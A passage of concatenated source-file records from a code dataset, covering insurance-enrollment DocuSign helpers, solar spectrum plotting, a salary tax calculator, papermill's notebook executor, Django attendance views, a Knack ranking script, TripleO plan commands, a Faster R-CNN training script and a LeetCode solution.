decimal.Decimal('0.00')\n payment_mode = ''\n applicant_effective_date = ''\n\n # Employee data\n applicants.append(dict(\n relationship=\"self\",\n name=self.get_employee_first(),\n last_name=self.get_employee_last(),\n coverage=coverage,\n coverage_tier=self.get_employee_coverage_tier(),\n premium=premium_amount,\n formatted_premium=premium,\n mode=payment_mode,\n effective_date=applicant_effective_date,\n birthdate=self.get_employee_birthdate(),\n selected_riders=self.data.get('rider_data', {}).get('emp', []),\n ))\n\n if self.data.get('spouse') and self.data['spouse']['first']:\n if self.did_spouse_select_coverage():\n coverage = self.get_spouse_coverage()\n premium = self.get_formatted_spouse_premium()\n premium_amount = self.get_spouse_premium()\n applicant_payment_mode = payment_mode\n applicant_effective_date = effective_date\n else:\n coverage = 'WAIVED'\n premium = ''\n premium_amount = decimal.Decimal('0.00')\n applicant_payment_mode = ''\n applicant_effective_date = ''\n\n applicants.append(dict(\n relationship=\"spouse\",\n name=self.data['spouse']['first'],\n last_name=self.data['spouse']['last'],\n coverage=coverage,\n coverage_tier=None,\n premium=premium_amount,\n formatted_premium=premium,\n mode=applicant_payment_mode,\n effective_date=applicant_effective_date,\n birthdate=self.data['spouse']['birthdate'],\n selected_riders=self.data.get('rider_data', {}).get('sp', []),\n ))\n\n for i, child in enumerate(self.data['children']):\n is_covered = child in self.get_covered_children()\n\n if is_covered:\n premium = self.get_formatted_child_premium(i)\n premium_amount = self.get_child_premium(i)\n\n # If this is not the first child, and this is a product that groups child premiums, set it to zero.\n if i > 0 and self.get_product_code() == 'Group CI':\n 
premium = '0.00'\n premium_amount = decimal.Decimal('0.00')\n\n applicant_payment_mode = payment_mode\n applicant_effective_date = effective_date\n else:\n premium = ''\n premium_amount = decimal.Decimal('0.00')\n applicant_payment_mode = ''\n applicant_effective_date = ''\n\n applicants.append(dict(\n relationship=\"child\",\n name=child['first'],\n last_name=child['last'],\n coverage=self.get_child_coverage(i) if is_covered else 'WAIVED',\n coverage_tier=None,\n premium=premium_amount,\n formatted_premium=premium,\n mode=applicant_payment_mode,\n effective_date=applicant_effective_date,\n birthdate=child['birthdate'],\n selected_riders=[]\n ))\n\n return applicants\n\n def get_employee_coverage_data(self):\n for d in self.get_applicant_data():\n if d['relationship'] == 'self':\n return d\n \n def get_spouse_coverage_data(self):\n for d in self.get_applicant_data():\n if d['relationship'] == 'spouse':\n return d\n \n def get_child_coverage_data(self):\n return [d for d in self.get_applicant_data()\n if d['relationship'] == 'child'\n ]\n\n def get_selected_employee_riders(self):\n return self.data.get('rider_data', {}).get('emp', [])\n\n def get_selected_spouse_riders(self):\n return self.data.get('rider_data', {}).get('sp', [])\n\n def has_bank_draft_info(self):\n return self.get('bank_info', None) is not None\n\n def get_bank_draft_info(self):\n return self.get('bank_info')\n\n def requires_paylogix_export(self):\n return self.has_bank_draft_info() and self.get_product().requires_paylogix_export(self.enrollment_record)\n\n def get_account_holder_name(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_holder_name', '')\n\n def get_routing_number(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('routing_number', '')\n\n def get_account_number(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_number', '')\n\n def get_account_type(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_type', '')\n\n def get_account_type_shorthand(self):\n account_type = self.get_account_type()\n if account_type and account_type.lower() == 'checking':\n return 'C'\n if account_type and account_type.lower() == 'savings':\n return 'S'\n return account_type\n\n def get_city_state_zip(self):\n if not self.has_bank_draft_info():\n return\n bank_info = self.get_bank_draft_info()\n return bank_info.get('city_state_zip', '')\n\n def get_bank_name(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('bank_name', '')\n\n def get_address_one(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('address_one', '')\n\n def get_address_two(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('address_two', '')\n\n def get_billing_city(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_city', '')\n\n def get_billing_state(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_state', '')\n\n def get_billing_zip(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_zip', '')\n\n # def get_case_riders(self):\n # #\n # if not self.case.product_settings:\n # return []\n #\n # product_settings = json.loads(self.case.product_settings)\n # rider_settings = 
product_settings.get('riders', [])\n\n    def did_finish_signing_in_wizard(self):\n        return self.did_employee_sign_in_wizard() and self.did_agent_sign_in_wizard()\n\n    def did_employee_sign_in_wizard(self):\n        return self.data.get('applicant_signed')\n    \n    def did_agent_sign_in_wizard(self):\n        return self.data.get('agent_signed')\n\n# For employee signing sessions\ndef build_callback_url(wizard_data, session_type):\n    is_ssl = app.config.get('IS_SSL', True)\n    hostname = app.config.get('HOSTNAME', '5starenroll.com')\n    scheme = 'https://' if is_ssl else 'http://'\n    # note: DS supplies the last parm of 'event' in the callback\n    return (u'{scheme}{hostname}/application_completed'\n            '?name={name}&type={session_type}'.format(\n                scheme=scheme,\n                hostname=hostname,\n                name=wizard_data['employee']['first'],\n                session_type=session_type,\n            ))\n\n\ndef build_callcenter_callback_url(case):\n    is_ssl = app.config.get('IS_SSL', True)\n    hostname = app.config.get('HOSTNAME', '5starenroll.com')\n    scheme = 'https://' if is_ssl else 'http://'\n    # note: DS supplies the last parm of 'event' in the callback\n    return (u'{scheme}{hostname}/enrollment-case/{case_id}#enrollment'.format(\n        scheme=scheme,\n        hostname=hostname,\n        case_id=case.id,\n    ))\n","sub_path":"taa/services/docusign/docusign_envelope.py","file_name":"docusign_envelope.py","file_ext":"py","file_size_in_byte":31361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8697571","text":"from numpy import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'serif'})\n\ntable5 = loadtxt(\"solspect.dat\")\n\nwav = table5[:,0]\nfw = table5[:,1]\nfw_cont = table5[:,2]\niw = table5[:,3]\niw_cont = table5[:,4]\n\nc =2.99792458e10\nk = 1.38065e-16\nh = 6.6261e-27\n\"\"\"\nplt.plot(wav, fw, label = \"fw\")\nplt.plot(wav, fw_cont, label = \"fw_cont\")\nplt.plot(wav, iw, label = \"iw\")\nplt.plot(wav, iw_cont, label = \"iw_cont\")\nplt.legend(loc= \"best\")\nplt.xlabel('Wavelength')\nplt.ylabel('Flux and intensities per wavelength')\n\nprint 'max(Ic)= ', max(iw_cont), 'at', wav[where(iw_cont == max(iw_cont))]\n\n#Conversion to values per frequency\n\nper = wav**2./c #conversion factor\nfv = fw*per\nfv_cont = fw_cont*per\niv = iw*per\niv_cont = iw_cont*per\n\nplt.plot(wav, fv, label = \"fv\")\nplt.plot(wav, fv_cont, label = \"fv_cont\")\nplt.plot(wav, iv, label = \"iv\")\nplt.plot(wav, iv_cont, label = \"iv_cont\")\nplt.legend(loc= \"best\")\nplt.xlabel('Wavelength')\nplt.ylabel('Flux and intensities per frequency')\n\nfor i in range(len(wav)):\n    if wav[i] == 0.80:\n        print iv_cont[i]\n\"\"\"\n#Planck function\ndef planck(T, wav):\n    return ((2.*h*c**2)/wav**5)*1./(exp( h*c/(wav*k*T))-1.)\n\nB = zeros(shape(wav))\nfor T in range(6500, 6000-1, -200):\n    B[:] = planck(T, wav[:]*1e-4)\n    plt.plot(wav, B, label= \"T=\" +str(T))\n    plt.legend(loc=\"best\")\n\n    \nplt.plot(wav, iw_cont*1e14, label = \"iw_cont\")\n#plt.plot(wav, planck(6000, wav))\nplt.title('Planck function')\nplt.xlabel('Wavelength')\nplt.ylabel('Intensity')\nplt.legend(loc=\"best\")\n\"\"\"\ndef invert_p(iw_cont, wav):\n    return h*c/(wav*1e-4*k)*1./log(2.*h*c**2/((wav*1e-4)**5*iw_cont*1e14)+1.)\n    \nTb = invert_p(iw_cont, wav)\nplt.plot(wav, Tb)\nplt.ylabel('Brightness 
temperature')\nplt.xlabel('Wavelength')\n\n#plt.yscale('log')\n#plt.xscale('log')\n\"\"\"\nplt.show()\n","sub_path":"ssb21.py","file_name":"ssb21.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424605048","text":"#!/usr/bin/env python3\nimport sys\ndef calsal(presalary):\n insurance = presalary * 0.165\n rest = presalary - insurance - 3500\n\n if rest <= 0:\n return presalary - insurance\n elif rest <= 1500:\n tax = rest * 0.03 - 0\n elif rest > 1500 and rest <= 4500:\n tax = rest * 0.10 - 105\n elif rest > 4500 and rest <= 9000:\n tax = rest * 0.20 - 555\n elif rest > 9000 and rest <= 35000:\n tax = rest * 0.25 - 1005\n elif rest > 35000 and rest <= 55000:\n tax = rest * 0.30 - 2755\n elif rest > 55000 and rest <= 80000:\n tax = rest * 0.35 - 5505\n else:\n tax = rest * 0.45 - 13505\n return presalary - insurance - tax\n\nif __name__ == '__main__':\n wlist = sys.argv[1:]\n for worker in wlist:\n try:\n id = int(worker.split(':')[0])\n presalary = int(worker.split(':')[1])\n except:\n print(\"Parameter Error\")\n exit(1)\n print(str(id) + ':' + format(calsal(presalary), \".2f\"))\n","sub_path":"w1/cal-v2/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614638738","text":"from __future__ import unicode_literals, print_function\n\nimport datetime\nimport sys\n\nfrom concurrent import futures\nfrom nbconvert.preprocessors import ExecutePreprocessor\nfrom nbconvert.preprocessors.execute import CellExecutionError\nfrom nbformat.v4 import output_from_msg\n\nfrom .iorw import write_ipynb\n\ntry:\n from queue import Empty # Py 3\nexcept ImportError:\n from Queue import Empty # Py 2\n\n# tqdm creates 2 globals lock which raise OSException if the execution\n# environment does not have shared memory for processes, e.g. AWS Lambda\ntry:\n from tqdm import tqdm\n\n no_tqdm = False\nexcept OSError:\n no_tqdm = True\n\nPENDING = \"pending\"\nRUNNING = \"running\"\nCOMPLETED = \"completed\"\n\n\ndef log_output(output):\n if output.output_type == \"stream\":\n if output.name == \"stdout\":\n sys.stdout.write(\"\".join(output.text))\n elif output.name == \"stderr\":\n sys.stderr.write(\"\".join(output.text))\n elif \"data\" in output and \"text/plain\" in output.data:\n sys.stdout.write(\"\".join(output.data['text/plain']) + \"\\n\")\n # Force a flush to avoid long python buffering for messages\n sys.stdout.flush()\n sys.stderr.flush()\n\n\nclass PapermillExecutePreprocessor(ExecutePreprocessor):\n \"\"\"Module containing a preprocessor that executes the code cells\n and updates outputs\"\"\"\n\n # Copyright (c) IPython Development Team.\n # Distributed under the terms of the Modified BSD License.\n\n # TODO: Delete this wrapper when nbconvert allows for setting preprocessor\n # hood in a more convienent manner\n\n def preprocess(self, nb, resources):\n \"\"\"\n Copied with one edit of super -> papermill_preprocessor from nbconvert\n\n Preprocess notebook executing each code cell.\n\n The input argument `nb` is modified in-place.\n\n Parameters\n ----------\n nb : NotebookNode\n Notebook being executed.\n resources : dictionary\n Additional resources used in the conversion process. 
For example,\n passing ``{'metadata': {'path': run_path}}`` sets the\n execution path to ``run_path``.\n\n Returns\n -------\n nb : NotebookNode\n The executed notebook.\n resources : dictionary\n Additional resources used in the conversion process.\n \"\"\"\n path = resources.get('metadata', {}).get('path') or None\n\n # clear display_id map\n self._display_id_map = {}\n\n kernel_name = nb.metadata.get('kernelspec', {}).get('name', 'python')\n if self.kernel_name:\n kernel_name = self.kernel_name\n self.log.info(\"Executing notebook with kernel: %s\" % kernel_name)\n self.km, self.kc = self.start_new_kernel(\n startup_timeout=self.startup_timeout,\n kernel_name=kernel_name,\n extra_arguments=self.extra_arguments,\n cwd=path,\n )\n self.kc.allow_stdin = False\n # Parent class requires self.nb to be present temporarily during preproc\n self.nb = nb\n\n try:\n nb, resources = self.papermill_preprocess(nb, resources)\n finally:\n self.kc.stop_channels()\n self.km.shutdown_kernel(now=self.shutdown_kernel == 'immediate')\n # Parent class required self.nb be removed after preproc\n delattr(self, 'nb')\n\n return nb, resources\n\n def start_new_kernel(self, startup_timeout=60, kernel_name='python', **kwargs):\n km = self.kernel_manager_class(kernel_name=kernel_name)\n km.start_kernel(**kwargs)\n kc = km.client()\n kc.start_channels()\n try:\n kc.wait_for_ready(timeout=startup_timeout)\n except RuntimeError:\n kc.stop_channels()\n km.shutdown_kernel()\n raise\n\n return km, kc\n\n def papermill_preprocess(self, nb, resources):\n \"\"\"\n This function acts as a replacement for the grandparent's `preprocess`\n method.\n\n We are doing this for the following reasons:\n\n 1. Notebooks will stop executing when they encounter a failure but not\n raise a `CellException`. This allows us to save the notebook with the\n traceback even though a `CellExecutionError` was encountered.\n\n 2. We want to write the notebook as cells are executed. We inject our\n logic for that here.\n\n 3. We want to include timing and execution status information with the\n metadata of each cell.\n\n Parameters\n ----------\n nb : NotebookNode\n Notebook being converted\n resources : dictionary\n Additional resources used in the conversion process. 
Allows\n preprocessors to pass variables into the Jinja engine.\n\n \"\"\"\n output_path = nb.metadata.papermill['output_path']\n\n # Reset the notebook.\n for cell in nb.cells:\n # Reset the cell execution counts.\n if cell.get(\"execution_count\") is not None:\n cell.execution_count = None\n\n # Clear out the papermill metadata for each cell.\n cell.metadata['papermill'] = dict(\n exception=None,\n start_time=None,\n end_time=None,\n duration=None,\n status=PENDING, # pending, running, completed\n )\n if cell.get(\"outputs\") is not None:\n cell.outputs = []\n\n # Execute each cell and update the output in real time.\n with futures.ThreadPoolExecutor(max_workers=1) as executor:\n\n # Generate the iterator\n if self.progress_bar and not no_tqdm:\n bar_format = \"{l_bar}{bar}{r_bar}\"\n if self.log_output:\n # We want to inject newlines if we're printing content between enumerations\n bar_format += \"\\n\"\n execution_iterator = tqdm(\n enumerate(nb.cells), total=len(nb.cells), bar_format=bar_format\n )\n else:\n execution_iterator = enumerate(nb.cells)\n\n for index, cell in execution_iterator:\n cell.metadata[\"papermill\"][\"status\"] = RUNNING\n future = executor.submit(write_ipynb, nb, output_path)\n t0 = datetime.datetime.utcnow()\n try:\n if not cell.source:\n continue\n\n nb.cells[index], resources = self.preprocess_cell(cell, resources, index)\n cell.metadata['papermill']['exception'] = False\n\n except CellExecutionError:\n cell.metadata['papermill']['exception'] = True\n break\n finally:\n t1 = datetime.datetime.utcnow()\n cell.metadata['papermill']['start_time'] = t0.isoformat()\n cell.metadata['papermill']['end_time'] = t1.isoformat()\n cell.metadata['papermill']['duration'] = (t1 - t0).total_seconds()\n cell.metadata['papermill']['status'] = COMPLETED\n future.result()\n return nb, resources\n\n def run_cell(self, cell, cell_index=0):\n msg_id = self.kc.execute(cell.source)\n self.log.debug(\"Executing cell:\\n%s\", cell.source)\n outs = cell.outputs = []\n\n while True:\n try:\n # We are not waiting for execute_reply, so all output\n # will not be waiting for us. 
This may produce currently unknown issues.\n                msg = self.kc.iopub_channel.get_msg(timeout=None)\n            except Empty:\n                self.log.warning(\"Timeout waiting for IOPub output\")\n                if self.raise_on_iopub_timeout:\n                    raise RuntimeError(\"Timeout waiting for IOPub output\")\n                else:\n                    break\n            if msg['parent_header'].get('msg_id') != msg_id:\n                # not an output from our execution\n                continue\n\n            msg_type = msg['msg_type']\n            self.log.debug(\"output: %s\", msg_type)\n            content = msg['content']\n\n            # set the prompt number for the input and the output\n            if 'execution_count' in content:\n                cell['execution_count'] = content['execution_count']\n\n            if msg_type == 'status':\n                if content['execution_state'] == 'idle':\n                    break\n                else:\n                    continue\n            elif msg_type == 'execute_input':\n                if self.log_output:\n                    sys.stdout.write(\n                        'Executing Cell {:-<40}\\n'.format(content.get(\"execution_count\", \"*\"))\n                    )\n                continue\n            elif msg_type == 'clear_output':\n                outs[:] = []\n                # clear display_id mapping for this cell\n                for display_id, cell_map in self._display_id_map.items():\n                    if cell_index in cell_map:\n                        cell_map[cell_index] = []\n                continue\n            elif msg_type.startswith('comm'):\n                continue\n\n            display_id = None\n            if msg_type in {'execute_result', 'display_data', 'update_display_data'}:\n                display_id = msg['content'].get('transient', {}).get('display_id', None)\n                if display_id:\n                    self._update_display_id(display_id, msg)\n                if msg_type == 'update_display_data':\n                    # update_display_data doesn't get recorded\n                    continue\n\n            try:\n                out = output_from_msg(msg)\n            except ValueError:\n                self.log.error(\"unhandled iopub msg: \" + msg_type)\n                continue\n            if display_id:\n                cell_map = self._display_id_map.setdefault(display_id, {})\n                output_idx_list = cell_map.setdefault(cell_index, [])\n                output_idx_list.append(len(outs))\n\n            if self.log_output:\n                log_output(out)\n            outs.append(out)\n\n        exec_reply = self._wait_for_reply(msg_id, cell)\n        if self.log_output:\n            sys.stdout.write(\n                'Ending Cell {:-<43}\\n'.format(\n                    exec_reply.get(\"content\", {}).get(\"execution_count\", content)\n                )\n            )\n            # Ensure our last cell messages are not buffered by python\n            sys.stdout.flush()\n\n        return exec_reply, outs\n","sub_path":"papermill/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91862561","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport json\nfrom .models import *\nfrom django.core.serializers import serialize\nfrom datetime import datetime\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef attendance(request):\n    if request.method == 'POST':\n        byte_data = request.body\n        # print(byte_data)\n        id = byte_data[:11].decode('utf-8')\n        user = User.objects.filter(user_id=id).exists()\n        # If a matching user is found, log an attendance entry in Record\n        if user:\n            user = User.objects.filter(user_id=id).first()\n            now = datetime.now()\n            date_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n            Record.objects.create(item_name=user.user_name, item_id=user.user_id, item_date=date_time, item_create_date= now)\n            response = '000'\n        else:\n            response = '001'\n        return HttpResponse(response)\n\n    response = '000'\n    return HttpResponse(response)\n\n\n'''\n    item_num = models.AutoField(primary_key=True)\n    item_name = models.CharField(max_length=20)\n    item_id = models.CharField(max_length=50)\n    item_date = models.DateTimeField(auto_now_add=True)\n\n'''\n\ndef timelist(request):\n    cli_request = json.loads(request.body)\n    try:\n        pageinfo = 
cli_request['pageinfo']\n        print(pageinfo)\n    except Exception:\n        print(\"argument error\")\n\n    # Create the paginator\n\n    records = []\n    total = Record.objects.count()\n    if total > 0:\n        datas = Record.objects.all().order_by('-item_date')\n        paginator = Paginator(datas, pageinfo['pagesize'])\n        # datas = paginator.get_page(pageinfo['currentpage'])\n        datas = []\n        try:\n            datas = paginator.page(pageinfo['currentpage'])\n            print(datas)\n        except Exception as error:\n            print(f\"page error:{error}\")\n\n        for data in datas:\n            record = {\"id\": data.item_id, \"name\": data.item_name, \"date\": data.item_date}\n            records.append(record)\n\n    return JsonResponse({\"timeList\":records, \"total\":total}, safe=False)\n\n\n\n","sub_path":"AttendanceSystem/server/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11702947","text":"if __name__ == '__main__' and __package__ is None:\n    from os import sys, path\n    sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nimport arrow\nimport knack_helpers\nimport data_helpers\nimport secrets\nimport pdb\n\n\n# KNACK CONFIG\nREFERENCE_OBJECT = 'object_27'\nPRIMARY_KEY = 'ATD_EVAL_ID'\nSTATUS_KEY = 'EVAL_STATUS'\nGROUP_KEY = 'YR_MO_RND'\nSCORE_KEY = 'EVAL_SCORE'\nCONCAT_KEYS = ['RANK_ROUND_MO', 'RANK_ROUND_YR']\nRANK_KEY = 'EVAL_RANK'\n\nKNACK_PARAMS = { \n    'REFERENCE_OBJECTS' : [REFERENCE_OBJECT],\n    'FIELD_NAMES' : [PRIMARY_KEY, RANK_KEY, STATUS_KEY, SCORE_KEY, 'RANK_ROUND_MO', 'RANK_ROUND_YR', 'EXCLUDE_FROM_RANKING'],\n    'APPLICATION_ID' : secrets.KNACK_CREDENTIALS['APP_ID'],\n    'API_KEY' : secrets.KNACK_CREDENTIALS['API_KEY']\n}\n\nnow = arrow.now()\n\ndef main(date_time):\n\n    try: \n        field_dict = knack_helpers.get_fields( KNACK_PARAMS )\n\n        field_lookup = knack_helpers.create_field_lookup(field_dict, parse_raw=True)\n\n        knack_data = knack_helpers.get_object_data( REFERENCE_OBJECT, KNACK_PARAMS )\n\n        knack_data = knack_helpers.parse_data(knack_data, field_dict, KNACK_PARAMS, include_ids=True)\n\n        knack_data = data_helpers.filter_by_key(knack_data, STATUS_KEY, ['NEW', 'IN PROGRESS', 'COMPLETED'])\n\n        knack_data = data_helpers.add_missing_keys(knack_data, [SCORE_KEY], ['0'])\n\n        knack_data = data_helpers.concat_key_values(knack_data, CONCAT_KEYS, GROUP_KEY, '_')\n        \n        knack_data_exclude = [record for record in knack_data if record['EXCLUDE_FROM_RANKING'] == True]\n\n        knack_data_include = [record for record in knack_data if record['EXCLUDE_FROM_RANKING'] == False]\n\n        # create list of scores grouped by group key\n        # scores are converted to integers\n        score_dict = {}\n\n        for row in knack_data_include:\n            key = row[GROUP_KEY]\n            score = int( row[SCORE_KEY] )\n\n            if key not in score_dict:\n                score_dict[key] = []\n\n            score_dict[key].append(score)\n\n        # reverse sort lists of scores\n        for key in score_dict:\n            score_dict[key].sort()\n            score_dict[key].reverse()\n\n        # get score rank and append record to payload\n        payload = []\n\n        for record in knack_data_include:\n            score = int( record[SCORE_KEY] )\n            key = record[GROUP_KEY]\n            rank = data_helpers.min_index(score_dict[key], score) + 1  # add one to score index, because list indices start at 0\n            \n            if RANK_KEY in record:\n                if record[RANK_KEY] != rank:\n                    record[RANK_KEY] = rank\n                    payload.append(record)\n\n            else:\n                record[RANK_KEY] = rank\n                payload.append(record)\n\n        # assign null ranks to records flagged as exclude from ranking\n        for record in knack_data_exclude:\n\n            if RANK_KEY in record:\n                # update excluded 
records if rank found\n if record[RANK_KEY] != '':\n record[RANK_KEY] = ''\n payload.append(record)\n\n # parse data to core fields\n payload = data_helpers.reduce_dicts(payload, [RANK_KEY, 'KNACK_ID'])\n\n # replace data keys with knack field names\n payload = data_helpers.replace_keys(payload, field_lookup)\n\n update_response = []\n\n # update knack records\n count = 0\n for record in payload:\n count += 1\n print( 'updating record {} of {}'.format( count, len(payload) ) )\n \n response_json = knack_helpers.update_record(record, KNACK_PARAMS)\n\n update_response.append(response_json)\n\n return update_response\n \n except Exception as e:\n print('Failed to process data for {}'.format(date_time))\n print(e)\n raise e\n\n\nr = main(now)\n\nprint('Donezo!')","sub_path":"traff_sig_req_rank.py","file_name":"traff_sig_req_rank.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102918992","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport logging\nimport uuid\n\nfrom osc_lib.command import command\nfrom osc_lib.i18n import _\n\nfrom tripleoclient import utils\nfrom tripleoclient.workflows import deployment\nfrom tripleoclient.workflows import plan_management\n\n\nclass ListPlans(command.Lister):\n \"\"\"List overcloud deployment plans.\"\"\"\n\n log = logging.getLogger(__name__ + \".ListPlans\")\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n\n workflow_client = self.app.client_manager.workflow_engine\n execution = workflow_client.action_executions.create(\n 'tripleo.plan.list')\n\n try:\n json_results = json.loads(execution.output)['result']\n except Exception:\n self.log.exception(\"Error parsing JSON %s\", execution.output)\n json_results = []\n\n result = []\n for r in json_results:\n result.append((r,))\n\n return ((\"Plan Name\",), result)\n\n\nclass DeletePlan(command.Command):\n \"\"\"Delete an overcloud deployment plan.\n\n The plan will not be deleted if a stack exists with the same name.\n \"\"\"\n\n log = logging.getLogger(__name__ + \".DeletePlan\")\n\n def get_parser(self, prog_name):\n parser = super(DeletePlan, self).get_parser(prog_name)\n parser.add_argument('plans', metavar='', nargs=\"+\",\n help=_('Name of the plan(s) to delete'))\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n\n workflow_client = self.app.client_manager.workflow_engine\n\n for plan in parsed_args.plans:\n print(\"Deleting plan %s...\" % plan)\n plan_management.delete_deployment_plan(workflow_client,\n container=plan)\n\n\nclass CreatePlan(command.Command):\n \"\"\"Create a deployment plan\"\"\"\n\n log = logging.getLogger(__name__ + \".CreatePlan\")\n\n def get_parser(self, prog_name):\n parser = super(CreatePlan, self).get_parser(prog_name)\n parser.add_argument(\n 'name',\n help=_('The name of the plan, which is used for the object '\n 'storage container, workflow environment 
and orchestration '\n                   'stack names.'))\n        parser.add_argument(\n            '--templates',\n            help=_('The directory containing the Heat templates to deploy. '\n                   'If this isn\\'t provided, the templates packaged on the '\n                   'Undercloud will be used.'),\n        )\n\n        return parser\n\n    def take_action(self, parsed_args):\n        self.log.debug(\"take_action(%s)\" % parsed_args)\n        clients = self.app.client_manager\n\n        name = parsed_args.name\n\n        if parsed_args.templates:\n            plan_management.create_plan_from_templates(\n                clients, name, parsed_args.templates)\n        else:\n            plan_management.create_default_plan(\n                clients, container=name, queue_name=str(uuid.uuid4()))\n\n\nclass DeployPlan(command.Command):\n    \"\"\"Deploy a deployment plan\"\"\"\n\n    log = logging.getLogger(__name__ + \".DeployPlan\")\n\n    def get_parser(self, prog_name):\n        parser = super(DeployPlan, self).get_parser(prog_name)\n        parser.add_argument('name', help=_('The name of the plan to deploy.'))\n        parser.add_argument('--timeout', '-t', metavar='',\n                            type=int,\n                            help=_('Deployment timeout in minutes.'))\n        return parser\n\n    def take_action(self, parsed_args):\n        self.log.debug(\"take_action(%s)\" % parsed_args)\n\n        clients = self.app.client_manager\n        orchestration_client = clients.orchestration\n        stack = utils.get_stack(orchestration_client, parsed_args.name)\n\n        print(\"Starting to deploy plan: {}\".format(parsed_args.name))\n        deployment.deploy_and_wait(self.log, clients, stack, parsed_args.name,\n                                   self.app_args.verbose_level,\n                                   timeout=parsed_args.timeout)\n","sub_path":"tripleoclient/v1/overcloud_plan.py","file_name":"overcloud_plan.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334476162","text":"import torch\nimport torchvision\nfrom carpk import Carpk\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport time\nimport os\nimport datetime\nfrom engine import train_one_epoch, evaluate\nimport utils\n\nroot_dir = '/alihome/zrg/linjie/dataset'\n\ncarpklotdataset = Carpk(root_dir,\n                        'train',\n                        transform=transforms.ToTensor(),\n                        imgformat=\"jpg\")\ndata_loader = DataLoader(carpklotdataset,\n                         batch_size=2,\n                         shuffle=True,\n                         num_workers=4,\n                         collate_fn=utils.collate_fn)\ncarpklotdataset_test = Carpk(root_dir,\n                             'test',\n                             transform=transforms.ToTensor(),\n                             imgformat=\"jpg\")\ndata_loader_test = DataLoader(carpklotdataset_test,\n                              batch_size=1,\n                              shuffle=False,\n                              collate_fn=utils.collate_fn)\n\nis_resume = True\nresume_path = None\n# Build the model, optimizer and LR scheduler up front, then restore\n# their states from the checkpoint when a resume path is given.\nmodel = torchvision.models.detection.fasterrcnn_resnet50_fpn(\n    num_classes=2, pretrained=False)\nparams = [p for p in model.parameters() if p.requires_grad]\noptimizer = torch.optim.SGD(params,\n                            lr=0.02,\n                            momentum=0.9,\n                            weight_decay=1e-4)\nlr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n                                                    milestones=[8, 11],\n                                                    gamma=0.1)\nif is_resume and resume_path:\n    print('Resume training')\n    checkpoint = torch.load(resume_path, map_location='cpu')\n    model.load_state_dict(checkpoint['model'])\n    optimizer.load_state_dict(checkpoint['optimizer'])\n    lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\ndevice = torch.device(\"cuda\")\nmodel.to(device)\n# Training\nprint('Start training')\nstart_time = time.time()\nfor epoch in range(10):\n    train_one_epoch(model, optimizer, data_loader, device, epoch, 50)\n    lr_scheduler.step()\n    if True:\n        utils.save_on_master(\n            {\n                'model': model.state_dict(),\n                'optimizer': optimizer.state_dict(),\n                'lr_scheduler': lr_scheduler.state_dict(),\n            }, 
os.path.join(\"./\", 'model_{}.pth'.format(epoch)))\n\n # evaluate after every epoch\n evaluate(model, data_loader_test, device=device)\n\ntotal_time = time.time() - start_time\ntotal_time_str = str(datetime.timedelta(seconds=int(total_time)))\nprint('Training time {}'.format(total_time_str))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516832587","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nfrom leetcode.Util import ListNode\nfrom leetcode import Util\n\n\nclass Solution:\n def numComponents(self, head: ListNode, g) -> int:\n cur = head\n while cur.val not in g:\n cur = cur.next\n ans = 1\n pre = cur\n cur = cur.next\n while cur:\n if cur.val in g and pre.val not in g:\n ans += 1\n pre = cur\n cur = cur.next\n return ans\n\n\ns = Solution()\nprint(s.numComponents(Util.createListNode([0, 1, 2, 3, 4]), {0, 3, 1, 